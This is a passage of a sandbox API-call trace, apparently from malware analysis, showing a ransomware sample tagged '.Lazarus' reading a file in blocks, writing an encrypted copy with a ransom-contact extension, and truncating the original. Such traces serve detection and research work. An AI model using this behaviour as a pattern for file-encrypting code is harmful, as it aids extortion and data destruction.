lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0061.840] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x327f738 | out: lpFileInformation=0x327f738*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x12fb4)) returned 1 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.840] AreFileApisANSI () returned 1 [0061.840] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x327f560, cbMultiByte=-1, lpWideCharStr=0x327f578, cchWideChar=260 | out: lpWideCharStr=".Lazarus") returned 9 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.840] GetLastError () returned 0x0 [0061.840] SetLastError (dwErrCode=0x0) [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2c) returned 0x4e1b8 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x120c) returned 0x84fb8 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x103) returned 0x8b680 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d6c0 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d510 [0061.840] GetLastError () returned 0x0 [0061.840] SetLastError (dwErrCode=0x0) [0061.840] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.840] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5f) returned 0x71a98 [0061.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8e) returned 0x5e570 [0061.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0061.841] AreFileApisANSI () returned 1 [0061.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 107 [0061.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x51398 [0061.841] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x5e570, cbMultiByte=-1, lpWideCharStr=0x51398, cchWideChar=107 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus") returned 107 [0061.841] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml.[ID=db2MhNyt6x][Mail=DecrypterSupport@protonmail.com].Lazarus" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml.[id=db2mhnyt6x][mail=decryptersupport@protonmail.com].lazarus"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0061.841] GetFileType (hFile=0x420) returned 0x1 [0061.841] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x51398 | out: hHeap=0x20000) returned 1 [0061.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0061.841] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.842] AreFileApisANSI () returned 1 [0061.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71ca0 [0061.842] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x71ca0, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0061.842] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f1a8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.842] GetFileType (hFile=0x428) returned 0x1 [0061.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71ca0 | out: hHeap=0x20000) returned 1 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x78) returned 0x6a5b0 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.842] GetLastError () returned 0x0 [0061.842] SetLastError (dwErrCode=0x0) [0061.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.842] GetLastError () returned 0x0 [0061.842] SetLastError (dwErrCode=0x0) [0061.842] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.842] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.842] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f030, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f030*=0x1000, lpOverlapped=0x0) returned 1 [0061.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x400) returned 0x70718 [0061.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d768 [0061.962] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x8c430 [0061.962] GetLastError () returned 0x0 [0061.962] SetLastError (dwErrCode=0x0) [0061.963] GetLastError () returned 0x0 [0061.963] SetLastError (dwErrCode=0x0) [0061.963] GetLastError () returned 0x0 [0061.963] SetLastError (dwErrCode=0x0) [0061.963] GetLastError () returned 0x0 [0061.963] SetLastError (dwErrCode=0x0) [0061.963] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.963] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.964] GetLastError () returned 0x0 [0061.964] SetLastError (dwErrCode=0x0) [0061.964] GetLastError () returned 0x0 [0061.964] SetLastError (dwErrCode=0x0) [0061.964] GetLastError () returned 0x0 [0061.964] SetLastError (dwErrCode=0x0) [0061.965] GetLastError () returned 0x0 [0061.965] SetLastError (dwErrCode=0x0) [0061.965] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.965] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.965] GetLastError () returned 0x0 [0061.965] SetLastError (dwErrCode=0x0) [0061.965] GetLastError () returned 0x0 [0061.965] SetLastError (dwErrCode=0x0) [0061.965] GetLastError () returned 0x0 [0061.965] SetLastError (dwErrCode=0x0) [0061.965] GetLastError () returned 0x0 [0061.965] SetLastError (dwErrCode=0x0) [0061.965] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.966] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.966] GetLastError () returned 0x0 [0061.966] SetLastError (dwErrCode=0x0) [0061.966] GetLastError () returned 0x0 [0061.966] SetLastError (dwErrCode=0x0) [0061.966] GetLastError () returned 0x0 [0061.966] SetLastError (dwErrCode=0x0) [0061.966] GetLastError () returned 0x0 [0061.966] SetLastError (dwErrCode=0x0) [0061.966] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.967] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.967] GetLastError () returned 0x0 [0061.967] SetLastError (dwErrCode=0x0) [0061.967] GetLastError () returned 0x0 [0061.967] SetLastError (dwErrCode=0x0) [0061.967] GetLastError () returned 0x0 [0061.967] SetLastError (dwErrCode=0x0) [0061.967] GetLastError () returned 0x0 [0061.967] SetLastError (dwErrCode=0x0) [0061.967] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.967] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.968] GetLastError () returned 0x0 [0061.968] SetLastError (dwErrCode=0x0) [0061.968] GetLastError () returned 0x0 [0061.968] SetLastError (dwErrCode=0x0) [0061.968] GetLastError () returned 0x0 [0061.968] SetLastError (dwErrCode=0x0) [0061.968] GetLastError () returned 0x0 [0061.968] SetLastError (dwErrCode=0x0) [0061.968] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.968] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.968] GetLastError () returned 0x0 [0061.969] SetLastError (dwErrCode=0x0) [0061.969] GetLastError () returned 0x0 [0061.969] SetLastError (dwErrCode=0x0) [0061.969] GetLastError () returned 0x0 [0061.969] SetLastError (dwErrCode=0x0) [0061.969] GetLastError () returned 0x0 [0061.969] SetLastError (dwErrCode=0x0) [0061.969] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.969] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.969] GetLastError () returned 0x0 [0061.969] SetLastError (dwErrCode=0x0) [0061.969] GetLastError () returned 0x0 [0061.970] SetLastError (dwErrCode=0x0) [0061.970] GetLastError () returned 0x0 [0061.970] SetLastError (dwErrCode=0x0) [0061.970] GetLastError () returned 0x0 [0061.970] SetLastError (dwErrCode=0x0) [0061.970] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.970] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.970] GetLastError () returned 0x0 [0061.970] SetLastError (dwErrCode=0x0) [0061.970] GetLastError () returned 0x0 [0061.970] SetLastError (dwErrCode=0x0) [0061.970] GetLastError () returned 0x0 [0061.970] SetLastError (dwErrCode=0x0) [0061.971] GetLastError () returned 0x0 [0061.971] SetLastError (dwErrCode=0x0) [0061.971] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.971] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.971] GetLastError () returned 0x0 [0061.971] SetLastError (dwErrCode=0x0) [0061.971] GetLastError () returned 0x0 [0061.971] SetLastError (dwErrCode=0x0) [0061.971] GetLastError () returned 0x0 [0061.971] SetLastError (dwErrCode=0x0) [0061.971] GetLastError () returned 0x0 [0061.971] SetLastError (dwErrCode=0x0) [0061.972] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.972] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.972] GetLastError () returned 0x0 [0061.972] SetLastError (dwErrCode=0x0) [0061.972] GetLastError () returned 0x0 [0061.972] SetLastError (dwErrCode=0x0) [0061.972] GetLastError () returned 0x0 [0061.972] SetLastError (dwErrCode=0x0) [0061.972] GetLastError () returned 0x0 [0061.972] SetLastError (dwErrCode=0x0) [0061.972] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.973] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.973] GetLastError () returned 0x0 [0061.973] SetLastError (dwErrCode=0x0) [0061.973] GetLastError () returned 0x0 [0061.973] SetLastError (dwErrCode=0x0) [0061.973] GetLastError () returned 0x0 [0061.973] SetLastError (dwErrCode=0x0) [0061.973] GetLastError () returned 0x0 [0061.973] SetLastError (dwErrCode=0x0) [0061.973] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.973] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.974] GetLastError () returned 0x0 [0061.974] SetLastError (dwErrCode=0x0) [0061.974] GetLastError () returned 0x0 [0061.974] SetLastError (dwErrCode=0x0) [0061.974] GetLastError () returned 0x0 [0061.974] SetLastError (dwErrCode=0x0) [0061.974] GetLastError () returned 0x0 [0061.974] SetLastError (dwErrCode=0x0) [0061.974] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.974] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.974] GetLastError () returned 0x0 [0061.974] SetLastError (dwErrCode=0x0) [0061.975] GetLastError () returned 0x0 [0061.975] SetLastError (dwErrCode=0x0) [0061.975] GetLastError () returned 0x0 [0061.975] SetLastError (dwErrCode=0x0) [0061.975] GetLastError () returned 0x0 [0061.975] SetLastError (dwErrCode=0x0) [0061.975] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.975] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.975] GetLastError () returned 0x0 [0061.975] SetLastError (dwErrCode=0x0) [0061.975] GetLastError () returned 0x0 [0061.975] SetLastError (dwErrCode=0x0) [0061.976] GetLastError () returned 0x0 [0061.976] SetLastError (dwErrCode=0x0) [0061.976] GetLastError () returned 0x0 [0061.976] SetLastError (dwErrCode=0x0) [0061.976] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.976] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.976] GetLastError () returned 0x0 [0061.976] SetLastError (dwErrCode=0x0) [0061.976] GetLastError () returned 0x0 [0061.977] SetLastError (dwErrCode=0x0) [0061.977] GetLastError () returned 0x0 [0061.977] SetLastError (dwErrCode=0x0) [0061.977] GetLastError () returned 0x0 [0061.977] SetLastError (dwErrCode=0x0) [0061.977] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.977] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.977] GetLastError () returned 0x0 [0061.977] SetLastError (dwErrCode=0x0) [0061.977] GetLastError () returned 0x0 [0061.977] SetLastError (dwErrCode=0x0) [0061.977] GetLastError () returned 0x0 [0061.978] SetLastError (dwErrCode=0x0) [0061.978] GetLastError () returned 0x0 [0061.978] SetLastError (dwErrCode=0x0) [0061.978] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x1000, lpOverlapped=0x0) returned 1 [0061.978] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.978] GetLastError () returned 0x0 [0061.978] SetLastError (dwErrCode=0x0) [0061.978] GetLastError () returned 0x0 [0061.978] SetLastError (dwErrCode=0x0) [0061.978] GetLastError () returned 0x0 [0061.978] SetLastError (dwErrCode=0x0) [0061.978] GetLastError () returned 0x0 [0061.978] SetLastError (dwErrCode=0x0) [0061.979] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0xfb4, lpOverlapped=0x0) returned 1 [0061.979] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x327eef8, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327eef8*=0x1000, lpOverlapped=0x0) returned 1 [0061.979] GetLastError () returned 0x0 [0061.979] SetLastError (dwErrCode=0x0) [0061.979] GetLastError () returned 0x0 [0061.979] SetLastError (dwErrCode=0x0) [0061.979] GetLastError () returned 0x0 [0061.979] SetLastError (dwErrCode=0x0) [0061.979] ReadFile (in: hFile=0x428, lpBuffer=0x861d0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x327f0c4, lpOverlapped=0x0 | out: lpBuffer=0x861d0*, lpNumberOfBytesRead=0x327f0c4*=0x0, lpOverlapped=0x0) returned 1 [0061.979] GetLastError () returned 0x0 [0061.979] SetLastError (dwErrCode=0x0) [0061.979] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0061.980] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x10) returned 0x7d738 [0061.980] GetLastError () returned 0x0 [0061.980] SetLastError (dwErrCode=0x0) [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d768 | out: hHeap=0x20000) returned 1 [0061.980] WriteFile (in: hFile=0x420, lpBuffer=0x8c430*, nNumberOfBytesToWrite=0xfc0, lpNumberOfBytesWritten=0x327ef70, lpOverlapped=0x0 | out: lpBuffer=0x8c430*, lpNumberOfBytesWritten=0x327ef70*=0xfc0, lpOverlapped=0x0) returned 1 [0061.980] GetLastError () returned 0x0 [0061.980] SetLastError (dwErrCode=0x0) [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0061.980] GetLastError () returned 0x0 [0061.980] SetLastError (dwErrCode=0x0) [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x70718 | out: hHeap=0x20000) returned 1 [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d738 | out: hHeap=0x20000) returned 1 [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a5b0 | out: hHeap=0x20000) returned 1 [0061.980] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8c430 | out: hHeap=0x20000) returned 1 [0061.980] CloseHandle (hObject=0x420) returned 1 [0061.982] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.982] CloseHandle (hObject=0x428) returned 1 [0061.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d070 [0061.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.983] AreFileApisANSI () returned 1 [0061.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.983] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x715b8 [0061.983] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x715b8, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml") returned 45 [0061.983] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1030\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1030\\localizeddata.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x327f170, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.984] GetFileType (hFile=0x428) returned 0x1 [0061.984] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.985] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1000) returned 0x861d0 [0061.985] GetLastError () returned 0xb7 [0061.985] SetLastError (dwErrCode=0xb7) [0061.985] WriteFile (in: hFile=0x428, lpBuffer=0x327de50*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x327de4c, lpOverlapped=0x0 | out: lpBuffer=0x327de50*, lpNumberOfBytesWritten=0x327de4c*=0x1, lpOverlapped=0x0) returned 1 [0061.985] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x861d0 | out: hHeap=0x20000) returned 1 [0061.986] CloseHandle (hObject=0x428) returned 1 [0061.986] AreFileApisANSI () returned 1 [0061.986] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e420, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.986] 